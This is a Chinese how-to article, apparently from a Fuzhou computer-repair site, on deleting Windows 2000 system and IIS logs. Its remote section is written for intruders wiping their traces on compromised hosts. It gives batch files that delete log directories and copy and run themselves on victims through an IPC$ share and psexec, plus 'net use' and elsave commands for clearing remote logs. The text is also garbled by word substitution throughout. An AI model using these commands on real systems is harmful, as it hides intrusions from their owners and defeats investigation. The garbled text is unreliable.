如何彻底清除本地和远程系统日志文件-个人安全-福州电脑维修|上门维修维护|包年电脑维修|IT外包

如何彻底清除本地和远程系统日志文件

什么这天记文件？它是一些文件系统集合，依靠建立起的种种数据的日记文件而存在。在任何系统发生崩溃或必要重新启动时，数据就遵从日记文件中的信息记载原封不动进行恢复。日记对于系统安全的作用是显而易见的，无论是网络办理员还是黑客都十分器重日记，一个有履历的办理员每每可以或许迅速通过日记了解到系统的安全功能，而一个聪明的黑客会在入侵乐成后迅速清撤除对本身不利的日记。无论是攻还是防，日记的重要性由此可见。下面我们就来简单讨论一下日记文件的扫除要领。
一、日记文件的地位
Windows 2000的系统日记文件有应用程序日记，安全日记、系统日记、DNS办事器日记等等，应用程序日记、安全日记、系统日记、DNS日记默认地位：%systemroot%system32config。
安全日记文件：%systemroot%system32configSecEvent.EVT
系统日记文件：%systemroot%system32configSysEvent.EVT
应用程序日记文件：%systemroot%system32configAppEvent.EVT
有的办理员很大概将这些日记重定位（以是日记大概不在下面那些地位），此中EVENTLOG下面有许多的子表，在内里可查到以上日记的定位目录。
二、扫除本身电脑中的日记
如果你要扫除本身电脑中的日记，可以用办理员的身份来登录Windows，然后在“控制面板”中进入“办理东西”，再双击内里的“事件检察器”。打开后我们就可以在这里扫除日记文件了，内里有应用程序、安全和系统日记文件。举个例子，比方说你想扫除安全日记，可以右键点击“安全日记”，在弹出的菜单中选择“属性”（图1）。接下来在弹出的对话框中，点击下面“扫除日记”按钮就可以扫除了（图2），如果你想以后再来扫除这些日记的话，可以将“按必要改写尺寸”，这样就可以在达到最大日记尺寸时进行改写事件了，不会提示你扫除日记。

图 1

图 2
三、扫除长途主机上的日记
大多数环境下，IIS的日记会忠实地记载它接收到的任何请求（也有特别的不被IIS记载的打击），一个良好的系统办理员会使用这点来发明入侵的计划，保护本身的系统。以是如果你是黑客，入侵系统乐成后第一件事便是扫除日记，擦去本身的踪迹，这时可以用以下两个措施：一是本身编写批处理文件来办理，编写一个能扫除日记的批处理十分简单，要领是：新建一个具有如下内容的批处理文件：
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:del.bat
把下面的内容生存为del.bat备用。在下面的代码中echo是DOS下的回显下令，在它的后面加上“@”前缀字符，表现执行时本行在下令行或DOS内里不表现，别的del下令各人一定清楚吧？它是删除文件下令。
接下来再新建一个批处理文件，内容如下：
@copy del.bat \%1c$
@echo 向肉鸡复制本机的del.bat……OK
@psexec \%1 c:del.bat
@echo 在肉鸡上运转del.bat，扫除日记文件……OK
生存为clean.bat即可，假定已经与肉鸡进行了IPC毗连，然后在CMD下输出：clean.bat 肉鸡IP，即可扫除肉鸡上的日记文件。
扫除日记的别的一个要领是借助第三方软件，如著名黑客软件流光的开辟者黑客小榕的elsave.exe，便是是一款可以长途扫除系统日记、应用程序日记、安全日记的软件，各人可以在网上下载到。elsave.exe使用起来很简单，起首使用得到的办理员账号与对方建立IPC会话：net use \ip pass /user: user，然后在下令行下执行如下下令：elsave -s \ip -l application -C，这样就删除了安全日记。